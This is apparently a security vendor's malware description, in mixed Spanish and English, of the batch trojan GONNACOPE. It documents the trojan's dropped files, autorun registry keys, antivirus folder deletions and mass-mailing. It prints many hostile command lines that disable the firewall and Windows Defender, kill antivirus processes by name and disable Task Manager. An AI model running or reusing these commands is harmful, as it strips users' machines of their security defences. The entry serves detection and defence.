Trojan.BAT.GONNACOPE.A

It arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

Elimina archivos para impedir la ejecución correcta de programas y aplicaciones.

Detalles de entrada

It arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

Instalación

Infiltra los archivos siguientes:

• %System Root%\downloader.vbs
• {Malware Path}\msg.vbs
• %Windows%\GonnaCope.bat

(Nota: %System Root% es la carpeta raíz, normalmente C:\. También es la ubicación del sistema operativo).

Agrega los procesos siguientes:

• net stop Security Center・
• netsh firewall set opmode mode=disable
• tskill /A av*
• tskill /A fire*
• tskill /A anti*
• tskill /A spy*
• tskill /A bullguard
• tskill /A PersFw
• tskill /A KAV*
• tskill /A ZONEALARM
• tskill /A SAFEWEB
• tskill /A OUTPOST
• tskill /A nv*
• tskill /A nav*
• tskill /A F-*
• tskill /A ESAFE
• tskill /A cle
• tskill /A BLACKICE
• tskill /A def*
• tskill /A kav
• tskill /A kav*
• tskill /A avg*
• tskill /A ash*
• tskill /A aswupdsv
• tskill /A ewid*
• tskill /A guard*
• tskill /A guar*
• tskill /A gcasDt*
• tskill /A msmp*
• tskill /A mcafe*
• tskill /A mghtml
• tskill /A msiexec
• tskill /A outpost
• tskill /A isafe
• tskill /A zap*
• tskill /A zauinst
• tskill /A upd*
• tskill /A zlclien*
• tskill /A minilog
• tskill /A cc*
• tskill /A norton*
• tskill /A norton au*
• tskill /A ccc*
• tskill /A npfmn*
• tskill /A loge*
• tskill /A nisum*
• tskill /A issvc
• tskill /A tmp*
• tskill /A mbamgui.exe
• tskill /A tmn*
• tskill /A pcc*
• tskill /A cpd*
• tskill /A pop*
• tskill /A pav*
• tskill /A padmin
• tskill /A panda*
• tskill /A avsch*
• tskill /A sche*
• tskill /A syman*
• tskill /A virus*
• tskill /A realm*
• tskill /A sweep*
• tskill /A scan*
• tskill /A ad-*
• tskill /A safe*
• tskill /A avas*
• tskill /A norm*
• tskill /A offg*
• net stop "WinDefend"
• taskkill /f /t /im "MSASCui.exe"
• net stop "security center"
• net stop sharedaccess
• netsh firewall set opmode mode-disable
• reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f
• "%System%\WScript.exe" "%System Root%\downloader.vbs"
• ping 127.0.0.1 -n 6
• RUNDLL32 USER32.DLL,SwapMouseButton
• "%System%\WScript.exe" "%System Root%\downloader.vbs"
• %Windows%\GonnaCope.bat
• %Application Data%\GonnaCopeDL.exe

(Nota: %System Root% es la carpeta raíz, normalmente C:\. También es la ubicación del sistema operativo).

Técnica de inicio automático

Agrega las siguientes entradas de registro para permitir su ejecución automática cada vez que se inicia el sistema:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
Windows\CurrentVersion\Run
AVAADA = %Windows%\GonnaCope.bat

HKEY_CURRENT_USER\Software\Microsoft\
Windows\CurrentVersion\Run
AVAADA = %Windows%\GonnaCope.bat

Otras modificaciones del sistema

Modifica los archivos siguientes:

• %Windows%\system.ini
• %Windows%\win.ini

(Nota: %Windows% es la carpeta de Windows, que suele estar en C:\Windows o C:\WINNT).

Elimina los archivos siguientes:

• %Program Files%\alwils~1\avast4\*.*
• %Program Files%\Lavasoft\Ad-awa~1\*.exe
• %Program Files%\kasper~1\*.exe
• %Program Files%\trojan~1\*.exe
• %Program Files%\f-prot95\*.dll
• %Program Files%\tbav\*.dat
• %Program Files%\avpersonal\*.vdf
• %Program Files%\Norton~1\*.cnt
• %Program Files%\Mcafee\*.*
• %Program Files%\Norton~1\Norton~1\Norton~3\*.*
• %Program Files%\Norton~1\Norton~1\speedd~1\*.*
• %Program Files%\Norton~1\Norton~1\*.*
• %Program Files%\Norton~1\*.*
• %Program Files%\avgamsr\*.exe
• %Program Files%\avgamsvr\*.exe
• %Program Files%\avgemc\*.exe
• %Program Files%\avgcc\*.exe
• %Program Files%\avgupsvc\*.exe
• %Program Files%\grisoft
• %Program Files%\nood32krn\*.exe
• %Program Files%\nood32\*.exe
• %Program Files%\nod32
• %Program Files%\nood32
• %Program Files%\kav\*.exe
• %Program Files%\kavmm\*.exe
• %Program Files%\kaspersky\*.*
• %Program Files%\ewidoctrl\*.exe
• %Program Files%\guard\*.exe
• %Program Files%\ewido\*.exe
• %Program Files%\pavprsrv\*.exe
• %Program Files%\pavprot\*.exe
• %Program Files%\avengine\*.exe
• %Program Files%\apvxdwin\*.exe
• %Program Files%\webproxy\*.exe
• %Program Files%\panda software\*.*

(Nota: %Program Files% es la carpeta Archivos de programa predeterminada, que suele estar en C:\Archivos de programa).

Rutina de descarga

Guarda los archivos que descarga con los nombres siguientes:

• %Application Data%/GonnaCopeDL.exe

(Nota: %Application Data% es la carpeta Application Data del usuario activo, que en el caso de Windows 98 y ME suele estar ubicada en C:\Windows\Profiles\{nombre de usuario}\Application Data, en el caso de Windows NT en C:\WINNT\Profiles\{nombre de usuario}\Application Data, en el caso de Windows 2000(32-bit), XP y Server 2003(32-bit) en C:\Documents and Settings\{nombre de usuario}\Local Settings\Application Data y en el caso de Windows Vista, 7, 8, 8.1, 2008(64-bit), 2012(64-bit) y 10(64-bit) en C:\Users\{nombre de usuario}\AppData\Roaming.).

Otros detalles

Hace lo siguiente:

• It swaps/reverses the left and right mouse buttons function.
• It sends the following email to the gathered email addresses:
  
  • Subject: Is this you?
  • Body: Man that has got to be embarrassing!
  • Attachment: %System%\mail.vbs
• It displays the following message box:
  
  • Message box title: ---------------------------
  • Message box content: GONNA COPE?"
• It stops the following services:
  
  • SDRSVC
  • security center
  • sharedaccess
  • WinDefend
  • wuauserv

(Nota: %System% es la carpeta del sistema de Windows, que en el caso de Windows 98 y ME suele estar en C:\Windows\System, en el caso de Windows NT y 2000 en C:\WINNT\System32 y en el caso de Windows 2000(32-bit), XP, Server 2003(32-bit), Vista, 7, 8, 8.1, 2008(64-bit), 2012(64bit) y 10(64-bit) en C:\Windows\System32).